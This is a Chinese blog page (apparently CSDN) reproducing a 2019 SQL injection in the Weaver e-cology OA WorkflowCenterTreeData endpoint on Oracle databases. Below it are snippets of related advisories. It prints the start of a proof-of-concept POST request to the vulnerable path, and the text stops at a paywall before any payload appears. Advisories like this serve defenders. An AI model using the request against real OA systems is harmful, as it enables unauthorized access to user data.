泛微OA WorkflowCenterTreeData接口注入复现(仅限oracle数据库)

最新推荐文章于 2024-10-02 10:51:38 发布
最新推荐文章于 2024-10-02 10:51:38 发布
阅读量117 收藏
点赞数
文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/po-ke-ye-sheng-miao/article/details/129357036
版权
本文介绍了泛微e-cology OA系统在2019年的一个SQL注入漏洞,该漏洞源于WorkflowCenterTreeData接口对Oracle数据库SQL语句的安全检查不足,允许攻击者注入恶意payload。修复方案建议在官方补丁发布前下线受影响的网站。
摘要由CSDN通过智能技术生成

背景

2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的,任意攻击者都可借SQL语句拼接时机注入恶意payload,造成SQL注入攻击。

漏洞描述

泛型微生态OA系统的WorkflowCenterTreeData接口在使用Oracle数据库时,由于内置sql语句分解不严密,导致其存在的sql注入漏洞

2648cd30883e5e1cf8cd0a90f0c31576.jpeg
format,png
(图片来源网络)

POC:

POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cook
最低0.47元/天 解锁文章
po-ke-ye-sheng-miao
关注
【漏洞预警】泛微OA WorkflowCenterTreeData接口注入漏洞(oracle数据库)
Summer's blog
05-13 7614
目录 0x01 漏洞描述 0x02 漏洞威胁等级 0x03 漏洞成因 0x04 漏洞复现 0x05 修复建议 0x06 免责申明 0x01 漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 0x02 漏洞威胁等级 高危 影响范围 所有使用Oracle数据库泛微服务...
oracle问题9017,泛微OA 曝出WorkflowCenterTreeData接口注入漏洞(oracle数据库)
weixin_39531992的博客
04-11 777
玄蜂安全团队10月10日了解到。泛微OA又双叒叕曝出了一个高危漏洞。其存在点是企业使用Oracle数据库在其系统的WorkflowCenterTreeData接口处会因为内置SQL语句拼接不严导致的一个注入漏洞。这个注入漏洞可以直接导致系统用户数据泄漏,篡改网页内容等一系列重大危害。建议用户,尽快升级到OA最新系统。前不久,泛微OA爆出了RCE(远程代码执行)漏洞,造成了较大影响,希望广大用户重视...
oracle sql 命令未正确结束_「漏洞预警」泛微E-cology OA系统SQL注入漏洞
weixin_39632057的博客
12-20 142
2019年10月,白帽汇安全研究院观测外网出现泛微办公软件的SQL注入漏洞,攻击者可在未经身份验证的情况下进行攻击,获得系统敏感数据。该漏洞目前属于0day,所有使用了Oracle数据库泛微网站都有可能受到影响,且利用难度低,危害大(可获取密码等敏感信息),预计会对泛微的主要服务地区——中国市场产生一定冲击。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle...
注入补丁_重大漏洞:泛微E-cology OA系统SQL注入漏洞及解决方案
weixin_33586063的博客
01-03 2575
泛微E-cology OA系统SQL注入漏洞cnvd 国家信息安全漏洞共享平台发布【漏洞预警】CNNVD关于泛微E-cology OA系统SQL注入漏洞情况的通报一、漏洞介绍 泛微E-cology OA系统是一套兼具企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理功能的协同商务平台。泛微e-cology OA系统的WorkflowCent...
【漏洞预警】泛微E-cology OA系统SQL注入漏洞
NOSEC2019的博客
10-10 2898
2019年10月,白帽汇安全研究院观测外网出现泛微办公软件的SQL注入漏洞,攻击者可在未经身份验证的情况下进行攻击,获得系统敏感数据。该漏洞目前属于0day,所有使用了Oracle数据库泛微网站都有可能受到影响,且利用难度低,危害大(可获取密码等敏感信息),预计会对泛微的主要服务地区——中国市场产生一定冲击。 该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Orac...
Web安全-泛微相关系统-历史漏洞
csjsz的博客
07-01 4913
2019年 泛微e-cology OA数据库配置信息泄漏 包括不于8.0、9.0版本 /mobile/dbconfigreader.jsp 2019年 泛微e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc) 2019年 泛微e-cology OA系统远程代码执行 0x02 影响范围 包括但不于7.0,8.0,8.1 /weaver/bsh.servlet.BshServlet/ CNVD-2019-34241 /mobile/browser/WorkflowCenterT
sql注入的防护方法_泛微e-cology OA SQL注入漏洞预警
weixin_39959192的博客
12-06 301
报告编号:B6-2019-101002报告来源:360-CERT报告作者:360-CERT更新日期:2019-10-100x00 漏洞背景2019年10月10日,360CERT监测到2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞,漏洞等级严重。泛微e-cology OA系统的WorkflowCenterTreeData接口在使用Oracle数据库时,由于内置S...
文件sql注入漏洞 shopex_泛微OA网站SQL注入漏洞的修复与安全建议
weixin_39826080的博客
12-22 468
近日,我们安全监测中心监控到泛微OA系统被爆出存在高危的sql注入漏洞,该移动办公OA系统,在正常使用过程中可以伪造匿名身份来进行SQL注入攻击,获取用户等隐私信息,目前该网站漏洞影响较大,使用此E-cology的用户,以及数据库oracle都会受到该漏洞的攻击,经过安全技术的POC安全测试,发现漏洞的利用非常简单,危害较大,可以获取管理员的账号密码,以及webshell。该OA系统漏洞的产生原因...
泛微OA-SQL注入漏洞
maverickpig的博客
01-23 8739
泛微OA sql注入汇总
sql server每天定时执行sql语句
doubleintfloat的博客
09-27 418
2、鼠标右击【SQL Server 代理】,选择【启动(S)】,如已启动,可以省略此步骤;3、右键,新建-》作业,在作业上-》新建作业,然后在作业上右键-》属性。1、打开SQL Server Management Studio。结果如下 , 定时每个10秒向数据库里插入一条数据。作业名称,数据库语句。
滚雪球学MySQL[7.3讲]:数据库日志与审计详解:从错误日志到审计日志的配置与使用
**My Coding Family**
10-01 1470
在上一期中,我们深入探讨了数据库的安全策略,特别是如何通过权管理、加密和用户认证来保护数据库免受未授权的访问。然而,尽管这些预防性措施非常重要,但仅靠安全策略并不能完全规避数据库运行中的潜在问题和安全隐患。要确保数据库的长期稳定、安全运行,日志与审计成为不可或缺的工具。通过对数据库活动进行记录和审查,管理员可以及时发现并解决系统中的故障和异常行为。本期文章将深入探讨日志与审计,具体涵盖日志的类型及配置(如错误日志、慢查询日志)以及审计日志的使用与配置。
SpringBoot之Profile的两种使用方式
shg的博客
09-30 1048
通常项目开发过程中,会经历多种环境转换,典型的如开发环境(dev)、测试环境(test)和生产环境(prod)。在这三种不同的环境下,连接数据库时使用的配置信息是不同的,即三个不同环境对应三个不同的数据库。 现在的需求是:当在不同的环境下,想通过修改配置文件来连接不同的数据库。比如在开发过程中启动项目时,想连接开发环境对应的数据库,可以在配置文件中指定 environment = dev。其他环境类似,此时就需要用到Spring为我们提供的Profile功能。
SQL中基本SELECT语句及常见关键字的使用(内连接,左/右连接)
qq_43800449的博客
09-29 874
DDL(Data Definition Languages)语句:数据定义语言,这些语句定义了不同的数据段、数据库、表、列、索引等数据库对象的定义。常用的语句关键字主要包括 create 、 drop 、 alter 、create等。DML(Data Manipulation Language)语句:数据操纵语句,用于添加、删除、更新和查询数据库记录(增删改查),并检查数据完整性,常用的语句关键字主要包括 insert 、 delete 、 update 等。
有哪些优化数据库性能的方法?如何定位慢查询?数据库性能优化全攻略:从慢查询定位到高效提升
最新发布
智通全网络工作室的博客
10-02 650
数据库性能优化是一个循序渐进的过程,从简单的索引和查询优化开始,到复杂的分区和配置调整。定位慢查询是优化过程中的关键环节,可以通过开启慢查询日志和使用EXPLAIN工具来找出性能瓶颈。希望这些技巧能帮助你优化数据库性能,提升应用的响应速度和用户体验!如果你在优化过程中遇到任何问题,或者有其他经验和技巧,欢迎在下方留言讨论!
Oracle数据库物理结构操作管理
m0_74344909的博客
09-29 433
Oracle物理结构操作管理
Spring的热部署工具和数据库密码加盐操作
2301_77053417的博客
09-28 689
加密过程:用户输入的密码+盐值 --> 字符串1,然后使用md5对字符串1加密得到字符串2,然后字符串2+盐值 --> 字符串3,这个字符串3就是存储在数据库中的密文。背景:如果我们的密码明文存储在数据库中,要是被窃取了是非常的危险的,所以我们在数据库中存储的密码不能是明文的,需要进行加密后存储,也就是数据库中存储的是密文。解密过程:取出数据库中的盐值和用户输入的密码得到字符串1,使用md5对字符串1加密得到字符串2,然后验证字符串2和数据库中的密文即可。做好以上的步骤,你项目中的热部署就已经做好了。
redo log 和 bin log 的两阶段提交
fujiang_xiao的博客
09-30 446
再根据 XID 去 bin log 中进行查找,如果 bin log 中不存在 XID,则说明 虽然 redo log 刷盘了,但是 bin log 没有刷盘,此时会进行事务回滚(根据 undo log 回滚)如果 bin log 存在 XID,则虽然 redo log 处于 prepare 状态,但 bin log 已经刷盘了,此时会对事务进行提交。会首先查看 redo log 的状态,如果 redo log 的状态为 commit,则说明事务的两阶段提交已经完成,可以放心进行数据恢复。
泛微OA数据库问题解决技巧速查
综上所述,泛微OA数据库相关问题处理涉及到ORACLE归档日志删除、ORACLE数据库集群环境导致的流程ID乱序、ORACLE SQL子查询带有ROWNUM时的语句报错、更新单表统计信息以及通过IMPDP导入数据等多个方面的问题。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值